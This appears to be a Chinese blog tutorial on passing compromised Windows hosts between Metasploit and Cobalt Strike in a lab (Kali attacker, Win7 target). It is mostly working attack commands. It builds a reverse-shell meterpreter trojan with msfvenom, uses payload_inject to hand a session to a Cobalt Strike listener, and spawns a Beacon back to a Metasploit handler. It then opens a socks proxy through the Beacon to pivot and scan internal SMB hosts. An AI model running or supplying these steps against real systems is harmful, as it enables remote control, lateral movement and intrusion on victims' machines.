环境

  • 攻击机:Kali,192.168.100.2

    • CS:监听器端口8080
    • MSF:监听端口9999
  • 靶机:Win7,192.168.100.4

MSF上线主机给CS

场景:当MSF有了一个Session会话,利用MSF注入功能,加载CS的Payload
  • MSF需要先拿到Shell。这里使用msfvenom生成一个恶意木马,并上传到靶机
$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=<MSF_IP> lport=<MSF_Port> -f exe > msf.exe

CS-MSF-1

  • MSF中开启监听,并在靶机中运行该木马
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp 
msf6 exploit(multi/handler) > set lhost <MSF_IP>
msf6 exploit(multi/handler) > set lport <MSF_Port>
msf6 exploit(multi/handler) > exploit 

CS-MSF-2

  • 在CS中创建监听器

    • 监听器类型:windows/beacon_http/reverse_http
    • Host修改为CS的IP,监听指定端口,等待MSF发送

CS-MSF-3

  • 在MSF中,将session挂到后台
# 挂起会话
meterpreter> background

# 使用payload_inject模块,执行之后会在本地产生一个新的Handler
msf> use exploit/windows/local/payload_inject

# 根据CS监听器类型选择对应的payload(http或者https)
msf> set payload windows/meterpreter/reverse_http

# 设置回连地址,CS_IP和监听器端口
msf> set LHOST <CS_IP>
msf> set LPORT <CS_Port>   # 前面CS监听器端口

# 指定要执行的Session
msf> set session <Session_ID>

# 设置MSF不启动监听,不然MSF会提示执行成功,但没有会话建立
msf> set disablepayloadhandler true 
msf> run
  • 运行后CS上线

CS-MSF-4

CS上线主机给MSF

场景:CS已上线主机,想把这个主机发送给MSF,生成一个MSF的Session
  • CS生成木马并上传到靶机,运行后主机上线
  • 打开MSF,开始监听
# 配置监听器
msf> use exploit/multi/handler

# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用64位
msf> set lhost <MSF_IP>
msf> set lport <MSF_Port>   # 设置任意端口进行监听

# 启动监听器
msf> run
  • 然后在CS上设置一个Foreign监听器MSF

    • IP设置为MSF的外网IP
    • 端口设置为MSF监听端口

CS-MSF-5

  • 在CS中右键会话,点击Spawn,选择MSF的监听器,或者在CS上线主机运行:
beacon> Spawn msf

CS-MSF-6

  • 发送后MSF获得Session

CS-MSF-7

CS代理给MSF

场景:CS已上线主机,通过CS开放一个socks代理,让MSF连接此代理进行内网渗透
  • 在CS上线主机Beacon中输入Socks监听端口
beacon> socks <Proxy_Prot>   # 设置任意端口进行代理

CS-MSF-8

  • 在菜单栏点击view > Proxy pirots,点击Tunnel,可以看到生成对应的命令
setg Proxies socks4:<CS_IP>:<Proxy_Prot>

CS-MSF-9

  • 开启MSF,输入命令进行设置代理
# MSF所有流量将走此代理
msf> setg Proxies socks4:<CS_IP>:<Proxy_Prot>

# 设置允许反向代理,即建立双向通道
# 如果通过此socks反弹shell,则需要开启,否则不推荐开启
msf> setg ReverseAllowProxy true

# 可以使用以下命令停止
msf> unsetg Proxies
  • 扫描指定网段中的445端口
msf> use auxiliary/scanner/smb/smb_version
msf> set rhost 192.168.100.0/24   # 靶机如果有其它网段也可以扫描
msf> set threads 10
msf> run

CS-MSF-10

最后修改:2021 年 04 月 01 日 10 : 15 AM
如果觉得我的文章对你有帮助,请我吃颗糖吧~